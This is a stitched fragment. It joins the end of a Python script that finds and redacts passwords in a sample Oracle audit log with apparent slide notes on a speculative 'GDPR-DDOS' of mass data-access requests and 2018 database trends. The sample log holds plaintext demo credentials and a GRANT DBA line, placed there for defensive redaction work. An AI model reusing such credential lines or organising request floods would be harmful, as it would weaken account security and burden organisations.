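Tue Oct 17 10:12:03 2017 +02:00
ACTION :[48] 'CREATE USER app_user IDENTIFIED BY "Summer2017!"'
ACTION :[48] 'GRANT DBA TO oopsiedaisy IDENTIFIED BY Pa55w0rd1'
ACTION :[55] 'ALTER USER hr IDENTIFIED BY VALUES 'S:ABCDEF0123456789''
ACTION :[83] 'CREATE DATABASE LINK rem CONNECT TO remote_user IDENTIFIED BY linkpw USING 'remote''
ACTION :[21] 'conn scott/tiger@orcl'
DATABASE USER:[3] 'SYS'
"""

if __name__ == "__main__":
    for lineno, idx, pw in find_passwords(SAMPLE_AUDIT_LOG):
        print(f"line {lineno}: pattern {idx} found password of length {len(pw)}")
    print(redact(SAMPLE_AUDIT_LOG))
```

Run find_passwords first to decide whether a file needs rewriting at all; the hash in the ALTER USER ... VALUES line is untouched, and the database link line is caught by the IDENTIFIED BY rule even though it also contains the word CONNECT.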
GDPR-DDOS
(Potential) upcoming attack in 2018: use social media (e.g. Twitter) to organize a GDPR-DDOS by asking thousands of users to exercise their rights under Art. 12 GDPR
What happens to your organization in 2018 if you get 10,000 GDPR Info request?
GDPR-Info Websites
It’s possible that new GDPR-Info websites will appear where customers can request all their information from the top-10,000 companies at once.
Could you imagine how much time it takes for companies to answer all these requests?
Trends 2018
Migration to 12.2
GDPR / DSGVO (May 2018)
More Data Discovery of personal data
More auditing projects
Integration Auditing with SIEM solutions